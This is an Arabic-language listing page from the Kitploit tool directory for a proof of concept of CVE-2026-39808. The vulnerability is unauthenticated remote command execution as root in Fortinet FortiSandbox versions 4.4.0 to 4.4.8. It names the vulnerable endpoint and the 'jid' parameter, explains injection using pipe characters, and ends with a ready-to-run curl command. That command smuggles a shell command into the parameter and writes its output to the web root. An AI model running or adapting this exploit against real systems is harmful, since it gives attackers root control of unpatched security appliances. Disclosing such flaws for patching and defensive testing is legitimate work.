Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-39808 — إثبات مفهوم (PoC) لثغرة RCE بدون مصادقة في FortiSandbox عبر CVE-2026-39808 | Kitploit
أدوات/GitHubGitHub/samu-delucas/cve-2026-39808
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubsamu-delucas/cve-2026-39808

CVE-2026-39808

إثبات مفهوم (PoC) لثغرة RCE بدون مصادقة في FortiSandbox عبر CVE-2026-39808

عرض المستودع
92منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-39808

في نوفمبر 2025، تم اكتشاف ثغرة أمنية حرجة في FortiSandbox من Fortinet سمحت لمهاجم غير مصادق بتنفيذ أوامر في نظام التشغيل الأساسي بصلاحيات الجذر (root). تم إصلاح الثغرة وأُعلن عنها أخيرًا في أبريل 2026.

تؤثر هذه الثغرة على إصدارات FortiSandbox من 4.4.0 إلى 4.4.8.

اقرأ النشرة الأمنية الكاملة هنا.

الثغرة

تؤثر الثغرة على نقطة النهاية /fortisandbox/job-detail/tracer-behavior. يمكن حقن أوامر نظام التشغيل باستخدام رمز الأنبوب (|) في معامل GET المسمى jid.

image008

في المثال أعلاه، تم توجيه المخرجات إلى ملف في جذر الويب بحيث يمكن استرجاعه لاحقًا.

image

PoC

يكفي أمر curl بسيط لتحقيق تنفيذ أوامر عن بُعد (RCE) بصلاحيات الجذر (root) دون أي مصادقة مسبقة:

root@kitploit:~
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"
تنزيل الأداة